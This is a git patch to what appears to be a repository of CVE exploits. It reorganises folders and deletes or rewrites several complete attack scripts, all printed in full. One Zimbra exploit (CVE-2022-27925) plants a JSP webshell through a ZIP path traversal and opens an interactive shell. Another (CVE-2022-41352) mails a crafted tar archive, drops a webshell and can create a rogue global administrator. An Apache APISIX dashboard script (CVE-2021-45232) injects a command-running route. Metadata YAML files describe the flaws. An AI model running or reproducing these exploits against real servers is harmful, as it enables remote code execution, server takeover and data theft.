From 5603b129657b01a2bd393f24bda3f1e8feaf8b8b Mon Sep 17 00:00:00 2001 
From: lastre3et Date: Mon, 8 May 2023 14:07:45 +0800 Subject: [PATCH] Update Repo Status --- cve/Zimbra/2022/CVE-2022-27925/exploit.py | 144 ----------- .../2022/CVE-2022-41352/cve-2022-41352.py | 236 ------------------ .../2021/cve-2021-45232/RedMe.md | 0 .../cve-2021-45232/apisix_dashboard_rce.py | 184 +++++++------- .../2021/yaml/cve-2021-45232.yaml} | 42 ++-- .../2022/cve-2022-24112/README.md | 0 .../2022/cve-2022-24112/apisix-exploit.py | 0 .../2022/yaml/CVE-2022-24112.yaml | 0 .../2020/CVE-2020-9490/README.md | 0 .../2020/CVE-2020-9490/apache_poc.py | 0 .../2020/yaml/CVE-2020-9490.yaml | 0 .../2021/CVE-2021-41773/README.md | 0 .../2021/CVE-2021-41773/exploit.py | 0 .../Pasted image 20220313024756.png | Bin .../Pasted image 20220313024903.png | Bin .../2021/CVE-2021-42013/PoC.sh | 0 .../2021/CVE-2021-42013/README.md | 0 .../2021/CVE-2021-42013/apache.png | Bin .../2021/yaml/CVE-2021-41773.yaml | 0 .../2021/yaml/CVE-2021-42013.yaml | 0 ...VE-2022-36946.yaml => CVE-2022-36946.yaml} | 34 +-- openkylin_list.yaml | 34 +-- other_list.yaml | 20 +- ...\346\264\236\346\250\241\347\211\210.yaml" | 10 +- 24 files changed, 161 insertions(+), 543 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-27925/exploit.py delete mode 100644 cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/RedMe.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2021/cve-2021-45232/apisix_dashboard_rce.py (96%) rename cve/{Apache-APISIX/2021/yaml/ cve-2021-45232.yaml => apache-Apsix/2021/yaml/cve-2021-45232.yaml} (97%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/README.md (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/cve-2022-24112/apisix-exploit.py (100%) rename cve/{Apache-APISIX => apache-Apsix}/2022/yaml/CVE-2022-24112.yaml (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/README.md (100%) rename cve/{apache => apache-Httpd}/2020/CVE-2020-9490/apache_poc.py (100%) rename cve/{apache => 
apache-Httpd}/2020/yaml/CVE-2020-9490.yaml (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/exploit.py (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/PoC.sh (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/README.md (100%) rename cve/{apache => apache-Httpd}/2021/CVE-2021-42013/apache.png (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-41773.yaml (100%) rename cve/{apache => apache-Httpd}/2021/yaml/CVE-2021-42013.yaml (100%) rename cve/linux-kernel/2022/yaml/{ CVE-2022-36946.yaml => CVE-2022-36946.yaml} (98%) diff --git a/cve/Zimbra/2022/CVE-2022-27925/exploit.py b/cve/Zimbra/2022/CVE-2022-27925/exploit.py deleted file mode 100644 index 3a952699..00000000 --- a/cve/Zimbra/2022/CVE-2022-27925/exploit.py +++ /dev/null @@ -1,144 +0,0 @@ -import argparse -import zipfile -import io -import random -import string -import requests -from urllib3.exceptions import InsecureRequestWarning -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%>
<%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "
"); Process p; if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){ p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd")); } else{ p = Runtime.getRuntime().exec(request.getParameter("cmd")); } OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); }}%>
' -char_set = string.ascii_uppercase + string.digits -webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp' -#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"] -BLUE = "\033[1;34m" -CYAN = "\033[1;36m" -GREEN = "\033[0;32m" -RED = "\033[31m" - -ITERATE = False - - -def banner(): - return CYAN+''' - _____ _ __ -/__ / (_)___ ___ / /_ _________ _ - / / / / __ `__ \/ __ \/ ___/ __ `/ - / /__/ / / / / / / /_/ / / / /_/ / -/____/_/_/ /_/ /_/_.___/_/ \__,_/ - CVE-2022-27925 - ''' - -# FIX URL -def fix_url(url): - if not url.startswith('https://'): - url = 'https://' + url - url = url.rstrip("/") - return url - -def build_zip(jsp, path): - zip_buffer = io.BytesIO() - zf = zipfile.ZipFile(zip_buffer, 'w') - zf.writestr(path, jsp) - zf.close() - return zip_buffer.getvalue() - -def exploit(host, payload, cmd): - headers = {'content-Type': 'application/x-www-form-urlencoded'} - try: - r = requests.post( - host + '', data=payload, headers=headers, verify=False, timeout=20) - r = requests.post( - host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20) - print(GREEN + '[!] Testing webshell') - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=' + cmd, verify=False, timeout=20) - if "Josexv1" in r.text: - print(CYAN + '[+] Webshell works!!') - print(GREEN + '[+] WebShell location: ' + - host + '/zimbraAdmin/' + webshell_name + "") - r = requests.get(host + '/zimbraAdmin/' + webshell_name + - '?cmd=uname+-a' , verify=False, timeout=20) - print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('
') - [1].split('
')[0].strip()) - return True - else: - print(RED + '[-] Target not vulnerable') - return False - except: - print(RED + '[!] Connection error') - -def ping_url(url): - try: - r = requests.get(url, verify=False, timeout=10) - if r.status_code == 200: - print(CYAN + '[!] Target is up!') - return True - else: - print(RED + '[!] Target is down! Next >> \n') - return False - except: - return False - -def main(url): - paths = [ - '../../../../mailboxd/webapps/zimbraAdmin/', - '../../../../jetty_base/webapps/zimbraAdmin/', - '../../../../jetty/webapps/zimbraAdmin/'] - work = 0 - try: - for num in range(0, 3): - print( - GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num]) - zippedfile = build_zip(webshell_payload, paths[num]+webshell_name) - print(GREEN + '[!] Exploiting!') - if exploit(url, zippedfile, 'echo "Josexv1"'): - if args.target: - answer = input( - CYAN + '[+] Want to interact with webshell via terminal? (y/n): ') - if answer == "y": - print(GREEN + '[!] Sending commands to: ' + - url + '/zimbraAdmin/' + webshell_name) - while True: - cmd = input(GREEN + "[+] $ > " + BLUE) - if cmd == "exit": - break - req = requests.get( - url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20) - try: - print(CYAN + req.text.split('
') - [1].split('
')[0].strip()) - except: - print(RED + "[!] Error ?") - else: - print(RED + '[!] Bye!') - exit() - except: - print(RED + '[!] URL Error') - ITERATE = True - -if __name__ == "__main__": - print(banner()) - parser = argparse.ArgumentParser() - parser.add_argument( - '-t', '--target', help='URl with protocol HTTPS', default=False) - parser.add_argument("-l", "--list", action="store", - help="List of targets", default=False) - args = parser.parse_args() - if args.target is not False: - url = fix_url(args.target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - elif args.list is not False: - with open(args.list, "rb") as targets: - for target in targets: - target = target.rstrip().decode("utf-8") - url = fix_url(target) - print(GREEN + '[!] Testing URL: '+ url) - if ping_url(url): - main(url) - else: - parser.print_help() - parser.exit() diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py deleted file mode 100644 index d440f7e6..00000000 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ /dev/null @@ -1,236 +0,0 @@ -#!/usr/bin/env python3 - -import sys -import smtplib -import argparse -from time import sleep -from email.mime.multipart import MIMEMultipart -from email.mime.application import MIMEApplication -from email.mime.text import MIMEText -import requests -from requests.packages.urllib3.exceptions import InsecureRequestWarning - -# CONFIGURATION -#---------------------------------- -TARGET = 'mail.test.org' -WEBSHELL_PATH = '/public/jsp' -WEBSHELL_NAME = 'Startup1_3.jsp' -ATTACHMENT = 'payload.tar' -SENDER = 'test@test.org' -RECIPIENT = 'admin@test.org' - -EMAIL_SUBJECT = 'CVE-2022-41352' -EMAIL_BODY = 'Just testing.

Don\'t mind me.

' -#---------------------------------- - -# Only change this if zimbra was not installed in the default location -UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' - - -def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): - # Block 1 - link = lnk.encode() - mode = b'0000777\x00' # link permissions - ouid = b'0001745\x00' # octal uid (997) - ogid = b'0001745\x00' # octal gid - lnsz = b'00000000000\x00' # file size (link = 0) - lmod = b'14227770134\x00' # last modified (octal unix) - csum = b' ' # checksum = 8 blanks - type = b'2' # type (link = 2) - targ = payload_path.encode() # link target - magi = b'ustar \x00' # ustar magic bytes + version - ownu = b'zimbra' # user owner - owng = b'zimbra' # group owner - vers = b'\x00'*8 + b'\x00'* 8 # device major and minor - pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) - - raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod - raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] - raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 - # pad block to 512 - raw_b1 += b'\00'*(512-len(raw_b1)) - - # Block 2 - mode = b'0000644\x00' # file permissions - file = f'{lnk}/{payload_name}'.encode() - flsz = oct(len(payload))[2:] # file size - csum = b' ' # checksum = 8 blanks - type = b'0' # type (file = 0) - targ = b'\x00'*100 # link target = none - - raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod - raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref - # calculate and insert checksum - csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] - raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 - # pad block to 512 - raw_b2 += b'\00'*(512-len(raw_b2)) - 
- - # Assemble - raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) - raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks - - return raw_tar - -# Update this if you want to use a legit email account for sending the payload -def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): - msg = MIMEMultipart() - msg['Subject'] = subject - msg['From'] = sender - msg['To'] = recipient - - message = MIMEText(body, 'html') - msg.attach(message) - - att = MIMEApplication(attachment) - att.add_header('Content-Disposition', 'attachment', filename=attachment_name) - msg.attach(att) - - try: - print(f'>>> Sending payload') - smtp_server = smtplib.SMTP(target,25) - smtp_server.sendmail(sender, recipient, msg.as_string()) - print(f'>>> Payload delivered') - except Exception as e: - print(f'[!] Failed to send the mail: {e}') - sys.exit(1) - -def verify_upload(target, shell, path): - print(f'>>> Verifying upload to {path}/{shell} ...') - sleep(5) # give the server time to process the email - resp = requests.get(f'https://{target}{path}/{shell}', verify=False) - if resp.status_code == 200: - print(f'>>> [PWNED] Upload successful!') - else: - print(f'>>> Upload unsuccesful :(') - sys.exit(1) - -def create_new_zimbra_admin(target, shell, path): - url = f'https://{target}' - pw = 'Pwn1ng_Z1mbra_!s_fun' - print(f'>>> Adding a new global administrator') - if (input(f'>>> Are you sure you want to continue? 
(yN): ') != 'y'): - sys.exit(0) - admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) - r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) - - print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') - print(f'>>> Email : {admin}') - print(f'>>> Password : {pw}') - - -def main(args): - global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY - - # Kali JSP WebShell - payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' - - # Using this instead of argparse default values to allow easy manual configuration as well - if args.payload: - try: - with open(args.payload, 'rb') as f: - payload = f.read() - except Exception as e: - print(f'Failed to read {args.payload}: {e}') - sys.exit(1) - print(f'>>> Using custom payload from: {args.payload}') - else: - print(f'>>> Using default payload: JSP Webshell') - if args.path: - WEBSHELL_PATH = args.path - if args.file: - WEBSHELL_NAME = args.file - if args.attach: - ATTACHMENT = args.attach - - tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) - - print(f'>>> Assembled payload attachment: {ATTACHMENT}') - print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'manual': - with open(ATTACHMENT, 'wb') as f: - f.write(tar) - print(f'>>> Attachment saved locally.') - sys.exit(0) - - if args.target: - TARGET = args.target - - print(f'>>> Targeting {TARGET}') - - if args.sender: - SENDER = args.sender - if args.recip: - RECIPIENT = args.recip - if args.subject: - EMAIL_SUBJECT = args.subject - if args.body: - try: - with open(args.body, 'rb') as f: - EMAIL_BODY = f.read().decode() - except Exception as e: - print(f'Failed to read {args.body}: {e}') - sys.exit(1) - print(f'>>> Using custom email body from: {args.body}') - - - smtp_send_file( TARGET, - SENDER, - RECIPIENT, - EMAIL_SUBJECT, - EMAIL_BODY, - tar, - ATTACHMENT ) - - requests.packages.urllib3.disable_warnings(InsecureRequestWarning) - - verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') - if args.mode == 'auto': - sys.exit(0) - - if args.payload: - print(f'>>> (!) 
"fullpwn" depends on the default JSP webshell - won\'t create the admin account') - else: - create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) - - sys.exit(0) - -if __name__ == '__main__': - epi = ''' -Alternatively, edit the script to change the default configuration. - -The available modes are: - - manual : Only create the payload - you have to deploy the payload yourself. - auto : Create a webshell and deploy it via SMTP. - fullpwn : After deploying a webshell, add a new global mail administrator. -''' - - p = argparse.ArgumentParser( - description = 'CVE-2022-41352 Zimbra RCE', - formatter_class = argparse.RawDescriptionHelpFormatter, - epilog = epi - ) - p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') - - p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') - p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') - p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') - p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') - p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') - p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') - p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') - p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') - p.add_argument('--body', required=False, metavar='', help=f'file containing the html 
content for the email body (default: "{EMAIL_BODY}")') - - args = p.parse_args() - - main(args) diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md b/cve/apache-Apsix/2021/cve-2021-45232/RedMe.md similarity index 100% rename from cve/Apache-APISIX/2021/cve-2021-45232/RedMe.md rename to cve/apache-Apsix/2021/cve-2021-45232/RedMe.md diff --git a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py similarity index 96% rename from cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py rename to cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py index edd12c9f..30ebcda5 100644 --- a/cve/Apache-APISIX/2021/cve-2021-45232/apisix_dashboard_rce.py +++ b/cve/apache-Apsix/2021/cve-2021-45232/apisix_dashboard_rce.py 
@@ -1,93 +1,93 @@ -#!/usr/bin/env python3 -import zlib -import json -import random -import requests -import string -import sys -from urllib3.exceptions import InsecureRequestWarning - -# Suppress only the single warning from urllib3 needed. -requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) - - -eval_config = { - "Counsumers": [], - "Routes": [ - { - "id": str(random.randint(100000000000000000, 1000000000000000000)), - "create_time": 1640674554, - "update_time": 1640677637, - "uris": [ - "/rce" - ], - "name": "rce", - "methods": [ - "GET", - "POST", - "PUT", - "DELETE", - "PATCH", - "HEAD", - "OPTIONS", - "CONNECT", - "TRACE" - ], - "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", - "status": 1 - } - ], - "Services": [], - "SSLs": [], - "Upstreams": [], - "Scripts": [], - "GlobalPlugins": [], - "PluginConfigs": [] -} - - -def random_str(): - return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) - - -def calc_crc(data): - crc32 = zlib.crc32(data) & 0xffffffff - return crc32.to_bytes(4, byteorder="big") - - -def export_data(url): - r = requests.get(url + "/apisix/admin/migrate/export", verify=False) - return r.text[:-4] - - -def import_data(url, data): - data = json.dumps(data).encode() - crc32 = calc_crc(data) - - files = {"file": ("data", data + crc32, "text/data")} - resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) - # print(resp.text) - if resp.json().get("code", -1) == 0: - return True - else: - return False - - -if __name__ == "__main__": - if len(sys.argv) != 2: - print("python " + sys.argv[0] + " http://127.0.0.1:9000") - exit() - - url = sys.argv[1] - if url.endswith("/"): - url = url[:-1] - - uri = random_str() - eval_config["Routes"][0]["uris"] = [ "/" + uri] - eval_config["Routes"][0]["name"] = uri - - if import_data(url, eval_config): - print("attack success") - print("uri is: " + 
"/" + uri) - else: +#!/usr/bin/env python3 +import zlib +import json +import random +import requests +import string +import sys +from urllib3.exceptions import InsecureRequestWarning + +# Suppress only the single warning from urllib3 needed. +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +eval_config = { + "Counsumers": [], + "Routes": [ + { + "id": str(random.randint(100000000000000000, 1000000000000000000)), + "create_time": 1640674554, + "update_time": 1640677637, + "uris": [ + "/rce" + ], + "name": "rce", + "methods": [ + "GET", + "POST", + "PUT", + "DELETE", + "PATCH", + "HEAD", + "OPTIONS", + "CONNECT", + "TRACE" + ], + "script": "local file = io.popen(ngx.req.get_headers()['cmd'],'r') \n local output = file:read('*all') \n file:close() \n ngx.say(output)", + "status": 1 + } + ], + "Services": [], + "SSLs": [], + "Upstreams": [], + "Scripts": [], + "GlobalPlugins": [], + "PluginConfigs": [] +} + + +def random_str(): + return ''.join(random.choices(string.ascii_letters + string.digits, k=6)) + + +def calc_crc(data): + crc32 = zlib.crc32(data) & 0xffffffff + return crc32.to_bytes(4, byteorder="big") + + +def export_data(url): + r = requests.get(url + "/apisix/admin/migrate/export", verify=False) + return r.text[:-4] + + +def import_data(url, data): + data = json.dumps(data).encode() + crc32 = calc_crc(data) + + files = {"file": ("data", data + crc32, "text/data")} + resp = requests.post(url + "/apisix/admin/migrate/import", files=files, verify=False) + # print(resp.text) + if resp.json().get("code", -1) == 0: + return True + else: + return False + + +if __name__ == "__main__": + if len(sys.argv) != 2: + print("python " + sys.argv[0] + " http://127.0.0.1:9000") + exit() + + url = sys.argv[1] + if url.endswith("/"): + url = url[:-1] + + uri = random_str() + eval_config["Routes"][0]["uris"] = [ "/" + uri] + eval_config["Routes"][0]["name"] = uri + + if import_data(url, eval_config): + print("attack success") + print("uri is: " + 
"/" + uri) + else: print("attack error") \ No newline at end of file diff --git a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml similarity index 97% rename from cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml rename to cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml index ad102017..3041c776 100644 --- a/cve/Apache-APISIX/2021/yaml/ cve-2021-45232.yaml +++ b/cve/apache-Apsix/2021/yaml/cve-2021-45232.yaml 
@@ -1,22 +1,22 @@ -id: CVE-2021-45232 -source: https://github.com/wuppp/cve-2021-45232-exp -info: - name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 - severity: CRITICAL - description: - CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 - scope-of-influence: - In Apache APISIX Dashboard before 2.10.1 - reference: - - http://www.openwall.com/lists/oss-security/2021/12/27/1 - - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 - - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 - - https://seclists.org/oss-sec/2021/q4/180 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-45232 - cwe-id: CWE-306 - cnvd-id: None - kve-id: None +id: CVE-2021-45232 +source: https://github.com/wuppp/cve-2021-45232-exp +info: + name: Apache APISIX Dashboard 是 Apache APISIX 网关 的可视化管理界面。 + severity: CRITICAL + description: + CVE-2021-45232 中,攻击者可构造恶意请求,获取到 apisix 的配置文件信息,或者利用其他接口导入恶意配置,利用APISIX Script功能从而执行任意命令。 + scope-of-influence: + In Apache APISIX Dashboard before 2.10.1 + reference: + - http://www.openwall.com/lists/oss-security/2021/12/27/1 + - https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232 + - https://lists.apache.org/thread/979qbl6vlm8269fopfyygnxofgqyn6k5 + - https://seclists.org/oss-sec/2021/q4/180 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 + cnvd-id: None + kve-id: None tags: cve2021 \ No newline at end of file diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/README.md b/cve/apache-Apsix/2022/cve-2022-24112/README.md similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/README.md rename to cve/apache-Apsix/2022/cve-2022-24112/README.md 
diff --git a/cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py b/cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py similarity index 100% rename from cve/Apache-APISIX/2022/cve-2022-24112/apisix-exploit.py rename to cve/apache-Apsix/2022/cve-2022-24112/apisix-exploit.py diff --git a/cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml similarity index 100% rename from cve/Apache-APISIX/2022/yaml/CVE-2022-24112.yaml rename to cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml diff --git a/cve/apache/2020/CVE-2020-9490/README.md b/cve/apache-Httpd/2020/CVE-2020-9490/README.md similarity index 100% rename from cve/apache/2020/CVE-2020-9490/README.md rename to cve/apache-Httpd/2020/CVE-2020-9490/README.md diff --git a/cve/apache/2020/CVE-2020-9490/apache_poc.py b/cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py similarity index 100% rename from cve/apache/2020/CVE-2020-9490/apache_poc.py rename to cve/apache-Httpd/2020/CVE-2020-9490/apache_poc.py diff --git a/cve/apache/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml similarity index 100% rename from cve/apache/2020/yaml/CVE-2020-9490.yaml rename to cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml diff --git a/cve/apache/2021/CVE-2021-41773/README.md b/cve/apache-Httpd/2021/CVE-2021-41773/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-41773/README.md rename to cve/apache-Httpd/2021/CVE-2021-41773/README.md diff --git a/cve/apache/2021/CVE-2021-41773/exploit.py b/cve/apache-Httpd/2021/CVE-2021-41773/exploit.py similarity index 100% rename from cve/apache/2021/CVE-2021-41773/exploit.py rename to cve/apache-Httpd/2021/CVE-2021-41773/exploit.py 
diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024756.png diff --git a/cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png b/cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png similarity index 100% rename from cve/apache/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png rename to cve/apache-Httpd/2021/CVE-2021-41773/screenshots/Pasted image 20220313024903.png diff --git a/cve/apache/2021/CVE-2021-42013/PoC.sh b/cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh similarity index 100% rename from cve/apache/2021/CVE-2021-42013/PoC.sh rename to cve/apache-Httpd/2021/CVE-2021-42013/PoC.sh diff --git a/cve/apache/2021/CVE-2021-42013/README.md b/cve/apache-Httpd/2021/CVE-2021-42013/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-42013/README.md rename to cve/apache-Httpd/2021/CVE-2021-42013/README.md diff --git a/cve/apache/2021/CVE-2021-42013/apache.png b/cve/apache-Httpd/2021/CVE-2021-42013/apache.png similarity index 100% rename from cve/apache/2021/CVE-2021-42013/apache.png rename to cve/apache-Httpd/2021/CVE-2021-42013/apache.png diff --git a/cve/apache/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-41773.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml diff --git a/cve/apache/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml similarity index 100% rename from cve/apache/2021/yaml/CVE-2021-42013.yaml rename to cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml 
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml similarity index 98% rename from cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml rename to cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml index eb773fd6..2c0bf1f0 100644 --- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml +++ b/cve/linux-kernel/2022/yaml/CVE-2022-36946.yaml @@ -1,18 +1,18 @@ -id: CVE-2022-36946 -source: https://github.com/Pwnzer0tt1/CVE-2022-36946 -info: - name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 - severity: 高危 - description: | - Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 - scope-of-influence: - 5.18.14 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 - - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2022-36946 +id: CVE-2022-36946 +source: https://github.com/Pwnzer0tt1/CVE-2022-36946 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: 高危 + description: | + Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。 + scope-of-influence: + 5.18.14 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-36946 + - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.5 + cve-id: CVE-2022-36946 tags: 拒绝服务,cve2022 \ No 